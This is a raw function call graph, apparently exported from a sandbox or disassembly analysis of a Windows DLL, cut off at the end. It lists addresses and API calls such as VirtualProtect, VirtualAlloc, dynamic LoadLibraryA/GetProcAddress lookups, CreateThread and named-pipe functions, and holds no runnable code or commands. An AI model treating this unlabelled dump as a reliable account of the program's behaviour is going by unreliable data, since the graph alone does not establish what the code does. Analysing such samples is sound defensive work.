7ffc130e4f0f ExitProcess 10335->10336 10339 7ffc130e4f46 10335->10339 10338 7ffc130e5571 10337->10338 10338->10326 10339->10339 10340 7ffc130e5013 VirtualAlloc 10339->10340 10341 7ffc130e4fbf ExitProcess 10339->10341 10340->10334 10345 7ffc130fe3c5 10344->10345 10346 7ffc130fe018 10344->10346 10347 7ffc130fe02f 10346->10347 10353 7ffc130fe199 10346->10353 10680 7ffc130fd350 10347->10680 10348 7ffc130fe2f3 10349 7ffc130ff160 PeekNamedPipe 10348->10349 10349->10345 10351 7ffc130fa750 24 API calls 10351->10353 10353->10348 10353->10351 10354 7ffc130f7c20 10355 7ffc130f7f40 10354->10355 10356 7ffc130f7ca0 10354->10356 10359 7ffc130f7f6e SetEndOfFile 10355->10359 10360 7ffc130f7f1f 10355->10360 10357 7ffc130f7cb7 VirtualProtect 10356->10357 10358 7ffc130f7e1e 10356->10358 10356->10360 10363 7ffc130f7d06 VirtualProtect 10357->10363 10358->10360 10364 7ffc130f7e7f GetProcessHeap 10358->10364 10365 7ffc130f7eac 10358->10365 10361 7ffc130e8bf0 24 API calls 10359->10361 10360->10290 10361->10360 10363->10358 10364->10365 10366 7ffc130f7e9e RtlReleasePrivilege 10364->10366 10684 7ffc130e82d0 10365->10684 10366->10365 10369 7ffc130fe85f 10368->10369 10370 7ffc130fe91e 10368->10370 10372 7ffc130ea280 2 API calls 10369->10372 10373 7ffc130fe899 10369->10373 10371 7ffc130fe93c UnlockFile 10370->10371 10370->10373 10371->10373 10374 7ffc130fe87e 10372->10374 10373->10283 10375 7ffc130ea280 2 API calls 10374->10375 10375->10373 10377 7ffc130fa064 10376->10377 10386 7ffc130fa220 10376->10386 10382 7ffc130e90b0 23 API calls 10377->10382 10377->10386 10378 7ffc130fa3c0 10381 7ffc130fa3f0 CallNamedPipeA 10378->10381 10383 7ffc130fa315 10378->10383 10379 7ffc130fa271 10379->10383 10740 7ffc130f75e0 10379->10740 10381->10381 10381->10383 10384 7ffc130fa19a 10382->10384 10383->10290 10730 7ffc130e2390 10384->10730 10386->10378 10386->10379 10388 7ffc130eaf67 10387->10388 10393 7ffc130eb204 10387->10393 10437 7ffc130e8bf0 10388->10437 10391 7ffc130eb17a 10391->10293 10392 7ffc130eb30e InitializeCriticalSection 10392->10391 10398 7ffc130eb2e2 10393->10398 10475 7ffc131009d0 10393->10475 10398->10391 10398->10392 10399 7ffc130eb0bc 10469 7ffc130e32c0 10399->10469 10402 7ffc130eaa26 10401->10402 10410 7ffc130eae58 10401->10410 10403 7ffc130eaa42 10402->10403 10404 7ffc130eacf1 10402->10404 10405 7ffc130e9ac0 2 API calls 10403->10405 10408 7ffc130ead20 WaitForSingleObject 10404->10408 10409 7ffc130ead72 10404->10409 10407 7ffc130eaa73 10405->10407 10411 7ffc130f8680 5 API calls 10407->10411 10408->10408 10408->10409 10585 7ffc130e90b0 10409->10585 10410->10301 10412 7ffc130eab5d 10411->10412 10413 7ffc130e9ac0 2 API calls 10412->10413 10414 7ffc130eab87 10413->10414 10414->10414 10576 7ffc130f9610 10414->10576 10416 7ffc130eacc4 10416->10301 10418 7ffc130ea378 10417->10418 10419 7ffc130ea41d 10417->10419 10591 7ffc130f9300 10418->10591 10421 7ffc130f8380 2 API calls 10419->10421 10423 7ffc130e4106 10421->10423 10425 7ffc130f8380 10423->10425 10426 7ffc130f83c6 10425->10426 10429 7ffc130f8464 10425->10429 10426->10429 10599 7ffc130ea280 10426->10599 10429->10305 10429->10429 10431 7ffc130e58ce 10430->10431 10434 7ffc130e597a 10430->10434 10603 7ffc130e6d50 10431->10603 10433 7ffc130e5958 __scrt_fastfail 10433->10305 10434->10433 10435 7ffc130e2a70 6 API calls 10434->10435 10436 7ffc130e6820 24 API calls 10434->10436 10435->10434 10436->10434 10438 7ffc130e8cdc 10437->10438 10440 7ffc130e8f6a 10437->10440 10479 7ffc130f8060 10438->10479 10439 7ffc130e8f48 10451 7ffc130fcdf0 10439->10451 10440->10439 10442 7ffc130e8f9b 10440->10442 10443 7ffc130e908f 10440->10443 10442->10439 10447 7ffc130e2a70 6 API calls 10442->10447 10443->10439 10445 7ffc130e909b CloseHandle 10443->10445 10445->10439 10447->10439 10448 7ffc130e8dd7 10495 7ffc130e1b10 10448->10495 10452 7ffc130eb02d 10451->10452 10453 7ffc130fce61 10451->10453 10462 7ffc130e2a70 10452->10462 10454 7ffc130fcfcb 10453->10454 10455 7ffc130fce70 10453->10455 10454->10452 10457 7ffc130fcfe5 CreateFileMappingA 10454->10457 10458 7ffc130e6820 24 API calls 10455->10458 10457->10452 10459 7ffc130fcf52 10458->10459 10561 7ffc130e2060 10459->10561 10461 7ffc130fcfbe 10461->10452 10463 7ffc130e2b11 10462->10463 10468 7ffc130e2c11 10462->10468 10464 7ffc130e2c16 10463->10464 10465 7ffc130e2b46 10463->10465 10463->10468 10467 7ffc130e2c43 GetProcessHeap 10464->10467 10464->10468 10565 7ffc130fd5f0 10465->10565 10467->10467 10467->10468 10468->10399 10470 7ffc130e3483 10469->10470 10472 7ffc130e335e 10469->10472 10471 7ffc130f9f80 24 API calls 10470->10471 10470->10472 10473 7ffc130e3536 10471->10473 10472->10391 10474 7ffc130fed60 24 API calls 10473->10474 10474->10472 10476 7ffc13100aa5 10475->10476 10477 7ffc13100a9a 10475->10477 10476->10393 10477->10476 10572 7ffc130fa750 10477->10572 10480 7ffc130f8104 10479->10480 10484 7ffc130f81e3 10479->10484 10499 7ffc130f88d0 10480->10499 10481 7ffc130e8d5b 10486 7ffc130f71b0 10481->10486 10483 7ffc130f825e InitializeCriticalSection 10504 7ffc130ea4f0 10483->10504 10484->10481 10484->10483 10484->10484 10487 7ffc130f7283 10486->10487 10490 7ffc130f72e7 10486->10490 10489 7ffc131009d0 23 API calls 10487->10489 10488 7ffc130f75cb 10488->10448 10489->10490 10490->10488 10491 7ffc130fe7e0 3 API calls 10490->10491 10492 7ffc130f74e9 10491->10492 10528 7ffc130e6820 10492->10528 10496 7ffc130e1b79 10495->10496 10498 7ffc130e1b89 10495->10498 10496->10498 10556 7ffc130fed60 10496->10556 10498->10439 10500 7ffc130f8cdf 10499->10500 10502 7ffc130f8986 10499->10502 10500->10481 10501 7ffc130f8995 10501->10481 10502->10501 10503 7ffc130e1b10 24 API calls 10502->10503 10503->10502 10505 7ffc130ea5c2 10504->10505 10508 7ffc130ea742 10504->10508 10506 7ffc130ea789 10505->10506 10507 7ffc130ea5d1 10505->10507 10506->10508 10511 7ffc130ea7d0 EnterCriticalSection 10506->10511 10513 7ffc130e11f0 10507->10513 10508->10481 10510 7ffc130ea64e 10512 7ffc130fe7e0 3 API calls 10510->10512 10511->10508 10511->10511 10512->10508 10514 7ffc130e1272 10513->10514 10515 7ffc130e130e 10513->10515 10523 7ffc130f84e0 10514->10523 10517 7ffc130e12f8 10515->10517 10521 7ffc130e1358 10515->10521 10518 7ffc130e147c GetProcessHeap 10517->10518 10522 7ffc130e14a9 10517->10522 10520 7ffc130e149b HeapFree 10518->10520 10518->10522 10519 7ffc130e1370 ReadFile 10519->10519 10519->10521 10520->10522 10521->10515 10521->10519 10522->10510 10522->10522 10524 7ffc130f8526 10523->10524 10525 7ffc130f8616 GetProcessHeap 10524->10525 10526 7ffc130f8654 10524->10526 10525->10526 10527 7ffc130f8635 RtlReleasePrivilege 10525->10527 10526->10517 10527->10517 10529 7ffc130e6947 10528->10529 10530 7ffc130e68ce CloseHandle 10528->10530 10531 7ffc130e6c67 10529->10531 10533 7ffc130e1b10 24 API calls 10529->10533 10535 7ffc130f8680 10529->10535 10530->10448 10531->10530 10532 7ffc131009d0 24 API calls 10531->10532 10532->10531 10533->10529 10536 7ffc130f886a 10535->10536 10537 7ffc130f8700 10535->10537 10536->10529 10538 7ffc130f87f6 10537->10538 10540 7ffc130fa4a0 10537->10540 10538->10529 10541 7ffc130fa608 HeapCreate LeaveCriticalSection 10540->10541 10543 7ffc130fa505 10540->10543 10554 7ffc130e1f20 10541->10554 10542 7ffc130fa5e8 10542->10538 10543->10542 10549 7ffc130e9ac0 10543->10549 10546 7ffc130fa719 LockFile 10546->10538 10547 7ffc130fa54d 10548 7ffc130e9ac0 2 API calls 10547->10548 10548->10542 10550 7ffc130e9b07 GetProcessHeap 10549->10550 10551 7ffc130e9af5 10549->10551 10552 7ffc130e9b5c __scrt_fastfail 10550->10552 10553 7ffc130e9b2d RtlAllocateHeap 10550->10553 10551->10547 10552->10547 10553->10552 10555 7ffc130e1f53 10554->10555 10555->10546 10555->10555 10557 7ffc130fedfe 10556->10557 10560 7ffc130fef01 10556->10560 10558 7ffc130ff060 CreateNamedPipeA 10557->10558 10557->10560 10559 7ffc130e8bf0 23 API calls 10558->10559 10559->10557 10560->10498 10562 7ffc130e20a8 10561->10562 10564 7ffc130e20b6 10561->10564 10563 7ffc130e2330 CreateThread 10562->10563 10562->10564 10563->10563 10563->10564 10564->10461 10564->10564 10566 7ffc130fd6aa 10565->10566 10570 7ffc130fd72e 10565->10570 10567 7ffc130fd7e0 10566->10567 10568 7ffc130fd6c0 10566->10568 10567->10570 10571 7ffc130fe7e0 3 API calls 10567->10571 10569 7ffc130e9ac0 2 API calls 10568->10569 10569->10570 10570->10468 10571->10567 10573 7ffc130fa881 10572->10573 10575 7ffc130fa7cd 10572->10575 10574 7ffc130ea2f0 24 API calls 10573->10574 10573->10575 10574->10575 10575->10476 10577 7ffc130f9699 10576->10577 10578 7ffc130f98d3 10576->10578 10579 7ffc130f96b4 10577->10579 10580 7ffc130f9723 10577->10580 10578->10416 10581 7ffc130e9ac0 2 API calls 10579->10581 10582 7ffc130f96e0 10580->10582 10583 7ffc130f9778 LeaveCriticalSection 10580->10583 10581->10582 10582->10416 10584 7ffc130ea4f0 9 API calls 10583->10584 10584->10580 10587 7ffc130e9234 10585->10587 10586 7ffc130e93b8 10586->10410 10587->10586 10588 7ffc130e9434 10587->10588 10589 7ffc130fed60 23 API calls 10588->10589 10590 7ffc130e9560 DeleteCriticalSection 10589->10590 10590->10586 10592 7ffc130f9361 10591->10592 10593 7ffc130ea3d6 10591->10593 10592->10593 10594 7ffc130f9f80 24 API calls 10592->10594 10595 7ffc130fbf00 10593->10595 10594->10593 10598 7ffc130fbf64 10595->10598 10596 7ffc130fc49b 10596->10423 10597 7ffc130fd080 ExitProcess 10597->10598 10598->10596 10598->10597 10600 7ffc130ea2de 10599->10600 10601 7ffc130ea2ae GetProcessHeap 10599->10601 10600->10305 10601->10600 10602 7ffc130ea2ca HeapFree 10601->10602 10602->10600 10604 7ffc130e6deb VirtualAlloc 10603->10604 10605 7ffc130e6e2c 10603->10605 10606 7ffc130e70f7 10604->10606 10607 7ffc130e2a70 6 API calls 10605->10607 10606->10433 10608 7ffc130e6edf 10607->10608 10612 7ffc130f98f0 10608->10612 10611 7ffc130fa750 24 API calls 10611->10606 10613 7ffc130f9cf0 10612->10613 10617 7ffc130e6f86 10612->10617 10618 7ffc130e9ba0 10613->10618 10615 7ffc130f9e24 10616 7ffc130f7c20 158 API calls 10615->10616 10616->10617 10617->10611 10620 7ffc130e9cc2 10618->10620 10619 7ffc130e9da4 10619->10615 10620->10619 10621 7ffc130e1b10 24 API calls 10620->10621 10622 7ffc130e9f35 10621->10622 10623 7ffc130f7c20 158 API calls 10622->10623 10624 7ffc130ea050 10623->10624 10629 7ffc130ff160 10624->10629 10627 7ffc130fcdf0 25 API calls 10628 7ffc130ea21a CreateThread 10627->10628 10628->10615 10630 7ffc130ff209 10629->10630 10631 7ffc130ea15f 10629->10631 10630->10631 10632 7ffc130ff230 PeekNamedPipe 10630->10632 10631->10627 10632->10631 10632->10632 10634 7ffc130faac9 10633->10634 10637 7ffc130e4923 10633->10637 10635 7ffc130ea4f0 9 API calls 10634->10635 10634->10637 10636 7ffc130fab80 10635->10636 10638 7ffc130e5840 161 API calls 10636->10638 10644 7ffc130e7120 10637->10644 10639 7ffc130fabff 10638->10639 10640 7ffc130fed60 24 API calls 10639->10640 10641 7ffc130facd2 10640->10641 10641->10637 10666 7ffc130fdb20 10641->10666 10643 7ffc130fad80 10643->10637 10645 7ffc130e7238 10644->10645 10646 7ffc130e49ab LoadLibraryA 10644->10646 10647 7ffc130e7368 10645->10647 10648 7ffc130e7246 10645->10648 10653 7ffc130e2730 10646->10653 10650 7ffc130e744c WaitForSingleObject UnlockFile 10647->10650 10651 7ffc130e72ab 10647->10651 10649 7ffc130f98f0 160 API calls 10648->10649 10649->10651 10650->10651 10651->10646 10652 7ffc130fa750 24 API calls 10651->10652 10652->10646 10654 7ffc130e27d1 10653->10654 10659 7ffc130e2875 10653->10659 10655 7ffc130e28bd 10654->10655 10656 7ffc130e27d9 10654->10656 10658 7ffc130fcdf0 25 API calls 10655->10658 10655->10659 10657 7ffc130e2850 GetProcAddress 10656->10657 10656->10659 10657->10659 10658->10655 10659->10316 10659->10659 10661 7ffc130e107b 10660->10661 10662 7ffc130e1092 GetProcAddress 10660->10662 10661->10662 10663 7ffc130e10fb 10662->10663 10664 7ffc130e10f1 10662->10664 10663->10310 10664->10663 10665 7ffc130e1179 HeapWalk 10664->10665 10665->10663 10665->10664 10667 7ffc130fdb6a 10666->10667 10668 7ffc130fdba4 10666->10668 10672 7ffc130fdc51 10667->10672 10673 7ffc130fb9b0 10667->10673 10671 7ffc130e8bf0 24 API calls 10668->10671 10668->10672 10670 7ffc130fdb93 10670->10643 10671->10672 10672->10643 10674 7ffc130fbeec 10673->10674 10679 7ffc130fb9f6 10673->10679 10674->10670 10675 7ffc130fbedc 10675->10670 10676 7ffc130fba40 LoadLibraryA 10676->10679 10677 7ffc130fbeb8 10677->10670 10678 7ffc130fbd3c GetProcAddress 10678->10679 10679->10675 10679->10676 10679->10677 10679->10678 10681 7ffc130fd581 10680->10681 10683 7ffc130fd3a3 10680->10683 10682 7ffc130fd5b0 GetProcessHeap 10681->10682 10681->10683 10682->10682 10682->10683 10683->10354 10685 7ffc130e82f8 10684->10685 10686 7ffc130e8373 10684->10686 10689 201640c6958 10685->10689 10686->10360 10690 201640c697b 10689->10690 10691 201640c6967 10689->10691 10710 201640c6ce4 10690->10710 10695 201640c6973 10691->10695 10697 201640c4db4 HeapCreate 10691->10697 10695->10360 10696 201640c698e HeapDestroy 10696->10695 10698 201640c4df5 10697->10698 10709 201640c4f01 10697->10709 10699 201640c4e94 10698->10699 10702 201640c4e26 HeapAlloc 10698->10702 10700 201640c4e9d HeapDestroy 10699->10700 10701 201640c4ea8 HeapAlloc 10699->10701 10700->10709 10703 201640c4ee1 10701->10703 10704 201640c4ed1 HeapDestroy 10701->10704 10705 201640c4e4b 10702->10705 10724 201640c487a memset 10703->10724 10704->10709 10705->10699 10707 201640c4eee 10708 201640c37e0 123 API calls 10707->10708 10708->10709 10709->10695 10711 201640c6d06 10710->10711 10712 201640c6982 10711->10712 10719 201640c6d2b 10711->10719 10726 201640c908c 10711->10726 10712->10695 10712->10696 10713 201640c6d5c 10716 201640c908c SetLastError 10713->10716 10720 201640c6d71 10713->10720 10715 201640c908c SetLastError 10715->10719 10716->10720 10717 201640c6d9f 10721 201640c908c SetLastError 10717->10721 10718 201640c6d85 HeapFree 10718->10717 10719->10713 10719->10715 10720->10717 10720->10718 10722 201640c6dad HeapFree 10721->10722 10722->10712 10725 201640cc060 10724->10725 10729 201640c90a0 10726->10729 10727 201640c90c3 SetLastError 10728 201640c90ce 10727->10728 10728->10719 10729->10727 10729->10728 10731 7ffc130e2415 10730->10731 10739 7ffc130e24cc 10730->10739 10732 7ffc130e2429 10731->10732 10736 7ffc130e25c8 10731->10736 10733 7ffc130e9ac0 2 API calls 10732->10733 10735 7ffc130e2457 10733->10735 10734 7ffc130e263a 10737 7ffc130e2060 CreateThread 10734->10737 10738 7ffc130ff160 PeekNamedPipe 10735->10738 10736->10734 10736->10736 10736->10739 10737->10739 10738->10739 10739->10386 10741 7ffc130f7677 10740->10741 10743 7ffc130f76c5 10740->10743 10742 7ffc130ea280 2 API calls 10741->10742 10746 7ffc130f7873 10741->10746 10744 7ffc130f769b 10742->10744 10745 7ffc130e90b0 24 API calls 10743->10745 10743->10746 10744->10383 10745->10746 10746->10383 11828 7ffc130ee000 11829 7ffc130ee031 11828->11829 11830 7ffc130ee019 11828->11830 11831 7ffc130ee114 __free_lconv_num 15 API calls 11829->11831 11830->11829 11832 7ffc130ee114 __free_lconv_num 15 API calls 11830->11832 11833 7ffc130ee044 11831->11833 11832->11829 11834 7ffc130ee114 __free_lconv_num 15 API calls 11833->11834 11835 7ffc130ee059 11834->11835 11836 7ffc130ee114 __free_lconv_num 15 API calls 11835->11836 11837 7ffc130ee06c 11836->11837 11838 7ffc130ee114 __free_lconv_num 15 API calls 11837->11838 11839 7ffc130ee07f 11838->11839 11148 7ffc130f32b8 11149 7ffc130f32c0 11148->11149 11150 7ffc130f32d5 11149->11150 11152 7ffc130f32ee 11149->11152 11151 7ffc130ee6a0 _get_daylight 15 API calls 11150->11151 11153 7ffc130f32da 11151->11153 11154 7ffc130ee2e4 36 API calls 11152->11154 11156 7ffc130f32e5 11152->11156 11155 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 11153->11155 11154->11156 11155->11156 11157 7ffc130eb7b4 11164 7ffc130ec810 11157->11164 11162 7ffc130ec824 22 API calls 11163 7ffc130eb7c1 11162->11163 11170 7ffc130ec984 11164->11170 11167 7ffc130ee0a4 11168 7ffc130ef168 _get_daylight 15 API calls 11167->11168 11169 7ffc130eb7ca 11168->11169 11169->11162 11169->11163 11171 7ffc130ec9a3 GetLastError 11170->11171 11172 7ffc130eb7bd 11170->11172 11173 7ffc130ecd90 __vcrt_FlsGetValue 6 API calls 11171->11173 11172->11163 11172->11167 11174 7ffc130ec9b6 11173->11174 11175 7ffc130eca21 SetLastError 11174->11175 11176 7ffc130ec9c6 11174->11176 11177 7ffc130ecde4 __vcrt_FlsSetValue 6 API calls 11174->11177 11175->11172 11176->11175 11178 7ffc130ec9d6 11177->11178 11178->11175 11179 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11178->11179 11180 7ffc130ec9e7 11179->11180 11181 7ffc130ec9fd 11180->11181 11182 7ffc130ecde4 __vcrt_FlsSetValue 6 API calls 11180->11182 11183 7ffc130ecde4 __vcrt_FlsSetValue 6 API calls 11181->11183 11184 7ffc130eca0e 11181->11184 11182->11181 11183->11184 11185 7ffc130ee114 __free_lconv_num 15 API calls 11184->11185 11185->11175 11840 201640c2a8c 11841 201640c908c SetLastError 11840->11841 11842 201640c2ac1 11841->11842 11843 201640c2add 11842->11843 11844 201640c2c91 11842->11844 11845 201640c908c SetLastError 11843->11845 11846 201640c908c SetLastError 11844->11846 11852 201640c2ae7 11845->11852 11847 201640c2c9b 11846->11847 11848 201640c2d69 11847->11848 11850 201640c908c SetLastError 11847->11850 11849 201640c908c SetLastError 11848->11849 11851 201640c2c8c 11849->11851 11854 201640c2cd4 11850->11854 11853 201640c908c SetLastError 11851->11853 11852->11851 11862 201640c908c SetLastError 11852->11862 11864 201640c49c8 11852->11864 11871 201640c4bb0 11852->11871 11889 201640c5e88 11852->11889 11856 201640c2d95 11853->11856 11854->11848 11855 201640c908c SetLastError 11854->11855 11859 201640c2cfc 11855->11859 11857 201640c908c SetLastError 11857->11859 11859->11848 11859->11857 11860 201640c4bb0 SetLastError 11859->11860 11860->11859 11862->11852 11895 201640c8b78 11864->11895 11866 201640c4a38 11866->11852 11867 201640c908c SetLastError 11868 201640c49f9 11867->11868 11868->11866 11868->11867 11869 201640c4a3a 11868->11869 11869->11866 11870 201640c908c SetLastError 11869->11870 11870->11866 11872 201640c4be4 11871->11872 11873 201640c908c SetLastError 11872->11873 11888 201640c4d36 11872->11888 11875 201640c4c37 11873->11875 11874 201640c4d59 11874->11852 11877 201640c908c SetLastError 11875->11877 11878 201640c4c57 11877->11878 11879 201640c908c SetLastError 11878->11879 11880 201640c4ca6 11879->11880 11904 201640c8470 11880->11904 11883 201640c908c SetLastError 11884 201640c4cee 11883->11884 11885 201640c908c SetLastError 11884->11885 11886 201640c4d09 11885->11886 11887 201640c908c SetLastError 11886->11887 11887->11888 11888->11874 11907 201640c9ccc 11888->11907 11890 201640c5ea6 11889->11890 11894 201640c5ed1 11889->11894 11891 201640c908c SetLastError 11890->11891 11892 201640c5eb4 11891->11892 11893 201640c908c SetLastError 11892->11893 11893->11894 11894->11852 11896 201640c487a memset 11895->11896 11897 201640c8bae 11896->11897 11898 201640c8c3a 11897->11898 11899 201640c908c SetLastError 11897->11899 11898->11868 11900 201640c8bc5 11899->11900 11901 201640c908c SetLastError 11900->11901 11902 201640c8c0d 11901->11902 11902->11898 11903 201640c908c SetLastError 11902->11903 11903->11898 11905 201640c908c SetLastError 11904->11905 11906 201640c4ccb 11905->11906 11906->11874 11906->11883 11908 201640c5e88 SetLastError 11907->11908 11909 201640c9ce9 11908->11909 11910 201640c5e88 SetLastError 11909->11910 11911 201640c9cf1 11910->11911 11912 201640c908c SetLastError 11911->11912 11916 201640c9d40 11911->11916 11913 201640c9d06 11912->11913 11914 201640c908c SetLastError 11913->11914 11917 201640c9d24 11913->11917 11914->11917 11915 201640c908c SetLastError 11915->11916 11916->11874 11917->11915 11918 201640c118c 11919 201640c908c SetLastError 11918->11919 11921 201640c11ab 11919->11921 11920 201640c11da 11921->11920 11922 201640c908c SetLastError 11921->11922 11922->11920 11923 7ffc130f0e30 11924 7ffc130f0e3c 11923->11924 11926 7ffc130f0e63 11924->11926 11927 7ffc130f3a70 11924->11927 11928 7ffc130f3a75 11927->11928 11929 7ffc130f3ab0 11927->11929 11930 7ffc130f3aa8 11928->11930 11931 7ffc130f3a96 DeleteCriticalSection 11928->11931 11929->11924 11932 7ffc130ee114 __free_lconv_num 15 API calls 11930->11932 11931->11930 11931->11931 11932->11929 11933 201640c6488 11934 201640c64b0 11933->11934 11935 201640c908c SetLastError 11934->11935 11936 201640c64c0 11935->11936 11937 201640c908c SetLastError 11936->11937 11938 201640c64e8 11937->11938 11939 201640c9ccc SetLastError 11938->11939 11940 201640c64fb 11939->11940 11031 7ffc130ed8ac 11032 7ffc130ed8c5 11031->11032 11033 7ffc130ed8c1 11031->11033 11034 7ffc130f05f8 49 API calls 11032->11034 11035 7ffc130ed8ca 11034->11035 11043 7ffc130f0a40 GetEnvironmentStringsW 11035->11043 11038 7ffc130ed8d7 11041 7ffc130ee114 __free_lconv_num 15 API calls 11038->11041 11041->11033 11042 7ffc130ee114 __free_lconv_num 15 API calls 11042->11038 11044 7ffc130f0a6e WideCharToMultiByte 11043->11044 11045 7ffc130f0b12 11043->11045 11044->11045 11049 7ffc130f0ac8 11044->11049 11047 7ffc130ed8cf 11045->11047 11048 7ffc130f0b1c FreeEnvironmentStringsW 11045->11048 11047->11038 11055 7ffc130ed918 11047->11055 11048->11047 11050 7ffc130ee154 _onexit 16 API calls 11049->11050 11051 7ffc130f0ad0 11050->11051 11052 7ffc130f0ad8 WideCharToMultiByte 11051->11052 11053 7ffc130f0aff 11051->11053 11052->11053 11054 7ffc130ee114 __free_lconv_num 15 API calls 11053->11054 11054->11045 11056 7ffc130ed939 11055->11056 11057 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11056->11057 11066 7ffc130ed967 11057->11066 11058 7ffc130ed9d6 11059 7ffc130ee114 __free_lconv_num 15 API calls 11058->11059 11060 7ffc130ed8e4 11059->11060 11060->11042 11061 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11061->11066 11062 7ffc130ed9c7 11081 7ffc130eda14 11062->11081 11066->11058 11066->11061 11066->11062 11067 7ffc130ed9fe 11066->11067 11070 7ffc130ee114 __free_lconv_num 15 API calls 11066->11070 11072 7ffc130ee1b4 11066->11072 11069 7ffc130ee5a0 _invalid_parameter_noinfo 17 API calls 11067->11069 11068 7ffc130ee114 __free_lconv_num 15 API calls 11068->11058 11071 7ffc130eda10 11069->11071 11070->11066 11073 7ffc130ee1c1 11072->11073 11074 7ffc130ee1cb 11072->11074 11073->11074 11078 7ffc130ee1e6 11073->11078 11075 7ffc130ee6a0 _get_daylight 15 API calls 11074->11075 11076 7ffc130ee1d2 11075->11076 11077 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 11076->11077 11079 7ffc130ee1de 11077->11079 11078->11079 11080 7ffc130ee6a0 _get_daylight 15 API calls 11078->11080 11079->11066 11080->11076 11082 7ffc130eda19 11081->11082 11083 7ffc130ed9cf 11081->11083 11084 7ffc130eda42 11082->11084 11086 7ffc130ee114 __free_lconv_num 15 API calls 11082->11086 11083->11068 11085 7ffc130ee114 __free_lconv_num 15 API calls 11084->11085 11085->11083 11086->11082 11941 7ffc130efe2c 11942 7ffc130efe54 11941->11942 11943 7ffc130efe4d 11941->11943 11944 7ffc130efe5b 11942->11944 11945 7ffc130efe8d 11942->11945 11946 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11944->11946 11945->11943 11952 7ffc130f0b44 11945->11952 11947 7ffc130efe66 11946->11947 11949 7ffc130ee114 __free_lconv_num 15 API calls 11947->11949 11949->11943 11950 7ffc130efeb8 11951 7ffc130ee114 __free_lconv_num 15 API calls 11950->11951 11951->11943 11953 7ffc130f0b4c 11952->11953 11954 7ffc130f0b8b 11953->11954 11955 7ffc130f0b7c 11953->11955 11956 7ffc130f0b95 11954->11956 11961 7ffc130f3918 11954->11961 11957 7ffc130ee6a0 _get_daylight 15 API calls 11955->11957 11968 7ffc130f3954 11956->11968 11960 7ffc130f0b81 __scrt_fastfail 11957->11960 11960->11950 11962 7ffc130f393a HeapSize 11961->11962 11963 7ffc130f3921 11961->11963 11964 7ffc130ee6a0 _get_daylight 15 API calls 11963->11964 11965 7ffc130f3926 11964->11965 11966 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 11965->11966 11967 7ffc130f3931 11966->11967 11967->11956 11969 7ffc130f3969 11968->11969 11970 7ffc130f3973 11968->11970 11971 7ffc130ee154 _onexit 16 API calls 11969->11971 11972 7ffc130f3978 11970->11972 11978 7ffc130f397f __vcrt_getptd_noexit 11970->11978 11977 7ffc130f3971 11971->11977 11974 7ffc130ee114 __free_lconv_num 15 API calls 11972->11974 11973 7ffc130f39be 11976 7ffc130ee6a0 _get_daylight 15 API calls 11973->11976 11974->11977 11975 7ffc130f39a8 HeapReAlloc 11975->11977 11975->11978 11976->11977 11977->11960 11978->11973 11978->11975 11979 7ffc130f0f5c __vcrt_getptd_noexit 2 API calls 11978->11979 11979->11978 11186 7ffc130feaa7 11187 7ffc130eb888 12 API calls 11186->11187 11188 7ffc130feab5 11187->11188 10747 7ffc130eb5a0 10748 7ffc130eb5c6 10747->10748 10749 7ffc130eb5dd dllmain_raw 10748->10749 10751 7ffc130eb5ce 10748->10751 10756 7ffc130eb5fd 10748->10756 10750 7ffc130eb5f0 10749->10750 10749->10751 10760 7ffc130eb3a0 10750->10760 10753 7ffc130eb64a 10753->10751 10754 7ffc130eb3a0 62 API calls 10753->10754 10755 7ffc130eb660 10754->10755 10755->10751 10757 7ffc130eb66a dllmain_raw 10755->10757 10756->10751 10756->10753 10758 7ffc130eb3a0 62 API calls 10756->10758 10757->10751 10759 7ffc130eb63d dllmain_raw 10758->10759 10759->10753 10761 7ffc130eb3a8 10760->10761 10767 7ffc130eb3e1 __scrt_acquire_startup_lock 10760->10767 10762 7ffc130eb3d5 10761->10762 10763 7ffc130eb3ad 10761->10763 10792 7ffc130eb89c 10762->10792 10764 7ffc130eb3c8 __scrt_dllmain_crt_thread_attach 10763->10764 10765 7ffc130eb3b2 10763->10765 10766 7ffc130eb3c6 10764->10766 10769 7ffc130eb3b7 10765->10769 10807 7ffc130eb7dc 10765->10807 10766->10756 10771 7ffc130eb565 10767->10771 10772 7ffc130ebc0c __scrt_fastfail 6 API calls 10767->10772 10782 7ffc130eb53a 10767->10782 10769->10756 10819 7ffc130eb858 10771->10819 10772->10771 10774 7ffc130eb56a 10824 7ffc130eb888 10774->10824 10775 7ffc130eb412 __scrt_acquire_startup_lock 10777 7ffc130eb43e 10775->10777 10788 7ffc130eb416 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 10775->10788 10812 7ffc130ebc0c 10775->10812 10800 7ffc130eb79c 10777->10800 10779 7ffc130eb575 __scrt_release_startup_lock 10829 7ffc130eba74 10779->10829 10782->10756 10783 7ffc130eb44d _RTC_Initialize 10783->10788 10803 7ffc130ebaf0 10783->10803 10787 7ffc130eb467 10789 7ffc130ebaf0 35 API calls 10787->10789 10788->10756 10790 7ffc130eb473 __scrt_initialize_default_local_stdio_options 10789->10790 10790->10788 10791 7ffc130eb48f __scrt_dllmain_after_initialize_c 10790->10791 10791->10788 10793 7ffc130eb8be __isa_available_init 10792->10793 10833 7ffc130ec7dc 10793->10833 10799 7ffc130eb8c7 10799->10775 10920 7ffc130eb8e8 10800->10920 10802 7ffc130eb7a7 10802->10783 10925 7ffc130ebaa0 10803->10925 10805 7ffc130eb462 10806 7ffc130ebbb4 InitializeSListHead 10805->10806 10940 7ffc130ee0b8 10807->10940 10813 7ffc130ebc2d __scrt_fastfail 10812->10813 10814 7ffc130ebc4d RtlCaptureContext RtlLookupFunctionEntry 10813->10814 10815 7ffc130ebc76 RtlVirtualUnwind 10814->10815 10816 7ffc130ebcb2 __scrt_fastfail 10814->10816 10815->10816 10817 7ffc130ebce4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10816->10817 10818 7ffc130ebd36 10817->10818 10818->10777 10820 7ffc130eb861 __scrt_release_startup_lock 10819->10820 10822 7ffc130eb875 10820->10822 11011 7ffc130edb0c 10820->11011 10822->10774 11019 7ffc130ee0dc 10824->11019 10827 7ffc130eca7c __vcrt_uninitialize_ptd 6 API calls 10828 7ffc130ec861 10827->10828 10828->10779 10830 